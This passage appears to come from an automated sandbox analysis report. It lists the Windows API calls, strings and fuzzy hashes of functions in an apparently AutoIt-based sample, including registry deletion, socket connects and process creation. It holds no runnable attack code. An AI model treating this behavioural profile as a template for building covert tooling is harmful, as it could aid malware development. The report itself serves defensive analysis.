                                                            • Instruction ID: f59c35df17f43520a46ec7f7df7f63a045b3479666a66c51b8174c56bf1f1195
                                                            • Opcode Fuzzy Hash: a0aec1666e6d1213ebbcbe5ca786efcda7d304b8e2bc700e2ad1b45d814eb6c8
                                                            • Instruction Fuzzy Hash: 9C4192B5600204EFDB16CF54C884BDABBB9EF44318F1581A9EE099F645E7B1DD40CBA0
                                                            APIs
                                                              • Part of subcall function 003C466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003C3697,?), ref: 003C468B
                                                              • Part of subcall function 003C466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003C3697,?), ref: 003C46A4
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 003C36B7
                                                            • _wcscmp.LIBCMT ref: 003C36D3
                                                            • MoveFileW.KERNEL32(?,?), ref: 003C36EB
                                                            • _wcscat.LIBCMT ref: 003C3733
                                                            • SHFileOperationW.SHELL32(?), ref: 003C379F
                                                            Strings
                                                            Similarity
                                                            • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                            • String ID: \*.*
                                                            • API String ID: 1377345388-1173974218
                                                            • Opcode ID: c6af9a79f1d2a76d5f57a99b496816427fcfd4e1a4bf919b1f68da7e43602877
                                                            • Instruction ID: d02c9fef834dc5e23815ae17e19230bae08037f65c784b700c66a5e9dc7b7fad
                                                            • Opcode Fuzzy Hash: c6af9a79f1d2a76d5f57a99b496816427fcfd4e1a4bf919b1f68da7e43602877
                                                            • Instruction Fuzzy Hash: 4A417FB1508344AEC753EF64C891EDF77ECAF89340F00496EB499C7251EA34DA89C756
                                                            APIs
                                                            • _memset.LIBCMT ref: 003E72AA
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003E7351
                                                            • IsMenu.USER32(?), ref: 003E7369
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003E73B1
                                                            • DrawMenuBar.USER32 ref: 003E73C4
                                                            Strings
                                                            Similarity
                                                            • API ID: Menu$Item$DrawInfoInsert_memset
                                                            • String ID: 0
                                                            • API String ID: 3866635326-4108050209
                                                            • Opcode ID: 1708645f9d319fc0058ac6a8720c130c4c13acb6a88027e6b17d6b661215ea4e
                                                            • Instruction ID: d134dbc700807f5d3bdf510242196e75022bb8251088be1683fdc1e40487003b
                                                            • Opcode Fuzzy Hash: 1708645f9d319fc0058ac6a8720c130c4c13acb6a88027e6b17d6b661215ea4e
                                                            • Instruction Fuzzy Hash: 6F415C75600259EFDB21DF51D884A9ABBF8FB05310F15862AFD059B290C770AD10DFA0
                                                            APIs
                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 003E0FD4
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003E0FFE
                                                            • FreeLibrary.KERNEL32(00000000), ref: 003E10B5
                                                              • Part of subcall function 003E0FA5: RegCloseKey.ADVAPI32(?), ref: 003E101B
                                                              • Part of subcall function 003E0FA5: FreeLibrary.KERNEL32(?), ref: 003E106D
                                                              • Part of subcall function 003E0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 003E1090
                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 003E1058
                                                            Similarity
                                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                            • String ID:
                                                            • API String ID: 395352322-0
                                                            • Opcode ID: f1ddcd235facbfd77223200115a043afe8df0570439768c30cc32524889a860d
                                                            • Instruction ID: 995aba2f21bc17eed292690256eafb0f9246057cb9ce048bb385cf836106850d
                                                            • Opcode Fuzzy Hash: f1ddcd235facbfd77223200115a043afe8df0570439768c30cc32524889a860d
                                                            • Instruction Fuzzy Hash: 7E310F71901159BFDB26DF91DC89EFFB7BCEF08310F000269E511A6191D6745E899AA0
                                                            APIs
                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 003E62EC
                                                            • GetWindowLongW.USER32(01645CF8,000000F0), ref: 003E631F
                                                            • GetWindowLongW.USER32(01645CF8,000000F0), ref: 003E6354
                                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 003E6386
                                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003E63B0
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 003E63C1
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003E63DB
                                                            Similarity
                                                            • API ID: LongWindow$MessageSend
                                                            • String ID:
                                                            • API String ID: 2178440468-0
                                                            • Opcode ID: 4bfc60c14d37d84ee49da08a838fbbc885e7fbeb662669eff4cf7422026698ff
                                                            • Instruction ID: 0c9217ecdbe77db21f7627641f2e82dbea3c6ba734e2836b74a5558f54a73120
                                                            • Opcode Fuzzy Hash: 4bfc60c14d37d84ee49da08a838fbbc885e7fbeb662669eff4cf7422026698ff
                                                            • Instruction Fuzzy Hash: A93116346402A09FDB22DF1ADC85F5837E5FB5A754F190264F510DF2F2CBB1A8408B51
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003BDB2E
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003BDB54
                                                            • SysAllocString.OLEAUT32(00000000), ref: 003BDB57
                                                            • SysAllocString.OLEAUT32(?), ref: 003BDB75
                                                            • SysFreeString.OLEAUT32(?), ref: 003BDB7E
                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 003BDBA3
                                                            • SysAllocString.OLEAUT32(?), ref: 003BDBB1
                                                            Similarity
                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                            • String ID:
                                                            • API String ID: 3761583154-0
                                                            • Opcode ID: f0a0deb585fb0394d52c5bbe430c8e0ad83615d2a3782ea309a2a53f5011e387
                                                            • Instruction ID: 6b9cb70e32e6d7c40ad34ce380f735ce4a0410559008c3cff9657f3f90cbd9d3
                                                            • Opcode Fuzzy Hash: f0a0deb585fb0394d52c5bbe430c8e0ad83615d2a3782ea309a2a53f5011e387
                                                            • Instruction Fuzzy Hash: 08219236600219AFDF11EFA9DC88CFB73ACEB09364B018565FA14DB6A0E6709D458B60
                                                            APIs
                                                              • Part of subcall function 003D7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 003D7DB6
                                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 003D61C6
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 003D61D5
                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 003D620E
                                                            • connect.WSOCK32(00000000,?,00000010), ref: 003D6217
                                                            • WSAGetLastError.WSOCK32 ref: 003D6221
                                                            • closesocket.WSOCK32(00000000), ref: 003D624A
                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 003D6263
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 910771015-0
                                                            • Opcode ID: 291a803e8fefe33624876894dd8f06615f91688f1726d48f3fc336ee1edcce62
                                                            • Instruction ID: 0874b6e8859931b423ed68a422c59770b2f15c469cdbe1156fd8f5a51fe15692
                                                            • Opcode Fuzzy Hash: 291a803e8fefe33624876894dd8f06615f91688f1726d48f3fc336ee1edcce62
                                                            • Instruction Fuzzy Hash: C531D572600104AFEF11AF24DC86BBD77ADEF45750F04842AFD159B291DB70AC048BA1
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                            • API String ID: 1038674560-2734436370
                                                            • Opcode ID: 91496b5d6bde522845ae3543331c322f5b59c76a5f4e696693a030e8c27b268c
                                                            • Instruction ID: 5f114c2510c0ced898e4a8f4365868f10f98ed100b7d9e29dc4393698db56a20
                                                            • Opcode Fuzzy Hash: 91496b5d6bde522845ae3543331c322f5b59c76a5f4e696693a030e8c27b268c
                                                            • Instruction Fuzzy Hash: F9212572205611AFD223B634AC03FF77398EF55788B11507AFA458A951EB909E42C395
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003BDC09
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003BDC2F
                                                            • SysAllocString.OLEAUT32(00000000), ref: 003BDC32
                                                            • SysAllocString.OLEAUT32 ref: 003BDC53
                                                            • SysFreeString.OLEAUT32 ref: 003BDC5C
                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 003BDC76
                                                            • SysAllocString.OLEAUT32(?), ref: 003BDC84
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                            • String ID:
                                                            • API String ID: 3761583154-0
                                                            • Opcode ID: 475e8a23e0f481dc07be11f7f32017a8eb6cd997276e805ba39d856f6b0e8e05
                                                            • Instruction ID: aca72efe8967c5b629f467a6315d59e8c68a0450ad798c92abb19f6a3768d297
                                                            • Opcode Fuzzy Hash: 475e8a23e0f481dc07be11f7f32017a8eb6cd997276e805ba39d856f6b0e8e05
                                                            • Instruction Fuzzy Hash: AD217435604205AF9B15EFA9DC88DFB77ECEB08364B118125FA14CB6E1E6B0DC41CB64
                                                            APIs
                                                              • Part of subcall function 00361D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00361D73
                                                              • Part of subcall function 00361D35: GetStockObject.GDI32(00000011), ref: 00361D87
                                                              • Part of subcall function 00361D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00361D91
                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 003E7632
                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 003E763F
                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 003E764A
                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 003E7659
                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 003E7665
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                            • String ID: Msctls_Progress32
                                                            • API String ID: 1025951953-3636473452
                                                            • Opcode ID: 261774995b98c691d46fcd24c0d42778d7ab97fdcb7080a9aaf8511822c944a4
                                                            • Instruction ID: 1ca63347fcfabba9b06d61ef5b3d98a5499b4664e2356cc2877e29b6133696d9
                                                            • Opcode Fuzzy Hash: 261774995b98c691d46fcd24c0d42778d7ab97fdcb7080a9aaf8511822c944a4
                                                            • Instruction Fuzzy Hash: AB11B6B1150129BFEF118F65CC85EE77F5DEF08798F114215F604A6090C7729C21DBA4
                                                            APIs
                                                            • __init_pointers.LIBCMT ref: 00389AE6
                                                              • Part of subcall function 00383187: EncodePointer.KERNEL32(00000000), ref: 0038318A
                                                              • Part of subcall function 00383187: __initp_misc_winsig.LIBCMT ref: 003831A5
                                                              • Part of subcall function 00383187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00389EA0
                                                              • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00389EB4
                                                              • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00389EC7
                                                              • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00389EDA
                                                              • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00389EED
                                                              • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00389F00
                                                              • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00389F13
                                                              • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00389F26
                                                              • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00389F39
                                                              • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00389F4C
                                                              • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00389F5F
                                                              • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00389F72
                                                              • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00389F85
                                                              • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00389F98
                                                              • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00389FAB
                                                              • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00389FBE
                                                            • __mtinitlocks.LIBCMT ref: 00389AEB
                                                            • __mtterm.LIBCMT ref: 00389AF4
                                                              • Part of subcall function 00389B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00389AF9,00387CD0,0041A0B8,00000014), ref: 00389C56
                                                              • Part of subcall function 00389B5C: _free.LIBCMT ref: 00389C5D
                                                              • Part of subcall function 00389B5C: DeleteCriticalSection.KERNEL32(02B,?,?,00389AF9,00387CD0,0041A0B8,00000014), ref: 00389C7F
                                                            • __calloc_crt.LIBCMT ref: 00389B19
                                                            • __initptd.LIBCMT ref: 00389B3B
                                                            • GetCurrentThreadId.KERNEL32 ref: 00389B42
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                            • String ID:
                                                            • API String ID: 3567560977-0
                                                            • Opcode ID: 78878b49b7fbbee4099abe6d257dfea8e09c6adfccb2fce2ed563ded34325cad
                                                            • Instruction ID: 4c995edd790c22a5aab8edfa7e60d6572c0e06003f26e42c97bf292fbed6e2c8
                                                            • Opcode Fuzzy Hash: 78878b49b7fbbee4099abe6d257dfea8e09c6adfccb2fce2ed563ded34325cad
                                                            • Instruction Fuzzy Hash: B7F0F0322193115AE63B7775BC037AA2690DF02730F294AEBF820DE0D2FF20880143A4
                                                            APIs
                                                            • _memset.LIBCMT ref: 003EB644
                                                            • _memset.LIBCMT ref: 003EB653
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00426F20,00426F64), ref: 003EB682
                                                            • CloseHandle.KERNEL32 ref: 003EB694
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _memset$CloseCreateHandleProcess
                                                            • String ID: oB$doB
                                                            • API String ID: 3277943733-2474204165
                                                            • Opcode ID: 244b7d89f2c904f521b3a5dabafcbc18a98352f5f573d4fa25c99a4ad2907fb4
                                                            • Instruction ID: 8e90c14475dd40336a24aafa8c9cecf98d4e6b6988429cb10abf83470bbb5710
                                                            • Opcode Fuzzy Hash: 244b7d89f2c904f521b3a5dabafcbc18a98352f5f573d4fa25c99a4ad2907fb4
                                                            • Instruction Fuzzy Hash: FBF05EB6640350BEEA222761BD46FBB7A9CEB08395F424031BA08E9196D7754C0187AC
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00383F85), ref: 00384085
                                                            • GetProcAddress.KERNEL32(00000000), ref: 0038408C
                                                            • EncodePointer.KERNEL32(00000000), ref: 00384097
                                                            • DecodePointer.KERNEL32(00383F85), ref: 003840B2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                            • String ID: RoUninitialize$combase.dll
                                                            • API String ID: 3489934621-2819208100
                                                            • Opcode ID: 5b1f5e770d6cd72e13dcdb83062702aceafbf81200ab837ab072775ae4168e0a
                                                            • Instruction ID: e44d5e30d74244cf066a6f0790b4978c2b37953b306b7a34a8413ee089e193c6
                                                            • Opcode Fuzzy Hash: 5b1f5e770d6cd72e13dcdb83062702aceafbf81200ab837ab072775ae4168e0a
                                                            • Instruction Fuzzy Hash: D0E012B4681304EFEA32AF60EC49B623AB8B704743F504238F611E90E0CFBA4211CB08
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _memmove$__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 3253778849-0
                                                            • Opcode ID: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
                                                            • Instruction ID: b0f60ba9f542841947e6e5bd083712e90b64b5818952ae5d395d147d10a55f3c
                                                            • Opcode Fuzzy Hash: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
                                                            • Instruction Fuzzy Hash: DD617A30500A5A9BCF07EF64CC82FFE37A9AF09308F448559F9599B296DB34AD15CB50
                                                            APIs
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                              • Part of subcall function 003E0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003DFDAD,?,?), ref: 003E0E31
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003E02BD
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003E02FD
                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 003E0320
                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 003E0349
                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 003E038C
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 003E0399
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                            • String ID:
                                                            • API String ID: 4046560759-0
                                                            • Opcode ID: e89d1a395baba842315c3790dd4ecd0815e5d438452cc580a25eafc038c2d393
                                                            • Instruction ID: f43f1b7c2a427046508181bb61a77da8260fedc16622e610fc9158961c8ceb92
                                                            • Opcode Fuzzy Hash: e89d1a395baba842315c3790dd4ecd0815e5d438452cc580a25eafc038c2d393
                                                            • Instruction Fuzzy Hash: 68516A311082409FC716EF64C885E6FBBE8FF84314F448A2DF5858B2A2DB71E945CB52
                                                            APIs
                                                            • GetMenu.USER32(?), ref: 003E57FB
                                                            • GetMenuItemCount.USER32(00000000), ref: 003E5832
                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 003E585A
                                                            • GetMenuItemID.USER32(?,?), ref: 003E58C9
                                                            • GetSubMenu.USER32(?,?), ref: 003E58D7
                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 003E5928
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountMessagePostString
                                                            • String ID:
                                                            • API String ID: 650687236-0
                                                            • Opcode ID: 9d0f72a76fbfa964af81dac3697dec50da0faf5f112233977a733081960cafcc
                                                            • Instruction ID: 376637d308939df76eff2d45445ad3ec6e736ae1a0584d38fe2fc9918a531308
                                                            • Opcode Fuzzy Hash: 9d0f72a76fbfa964af81dac3697dec50da0faf5f112233977a733081960cafcc
                                                            • Instruction Fuzzy Hash: CB516035E00665EFCF16EF65C885AAEB7B8EF48314F114169E815BB391CB70AE41CB90
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 003BEF06
                                                            • VariantClear.OLEAUT32(00000013), ref: 003BEF78
                                                            • VariantClear.OLEAUT32(00000000), ref: 003BEFD3
                                                            • _memmove.LIBCMT ref: 003BEFFD
                                                            • VariantClear.OLEAUT32(?), ref: 003BF04A
                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 003BF078
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Variant$Clear$ChangeInitType_memmove
                                                            • String ID:
                                                            • API String ID: 1101466143-0
                                                            • Opcode ID: 329dbd5deb07ed2b958d0100f8b80dac71aa2c71eec8f3ed39e75a9e67e90a4a
                                                            • Instruction ID: fe1457a67525b357c3e8dd48b46b6a4490dfdc1e769b777f534c4291820ceb33
                                                            • Opcode Fuzzy Hash: 329dbd5deb07ed2b958d0100f8b80dac71aa2c71eec8f3ed39e75a9e67e90a4a
                                                            • Instruction Fuzzy Hash: 4C5169B5A00209EFCB15DF58C880AAAB7B8FF4C314F158569EA59DB351E734E911CFA0
                                                            APIs
                                                            • _memset.LIBCMT ref: 003C2258
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003C22A3
                                                            • IsMenu.USER32(00000000), ref: 003C22C3
                                                            • CreatePopupMenu.USER32 ref: 003C22F7
                                                            • GetMenuItemCount.USER32(000000FF), ref: 003C2355
                                                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 003C2386
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
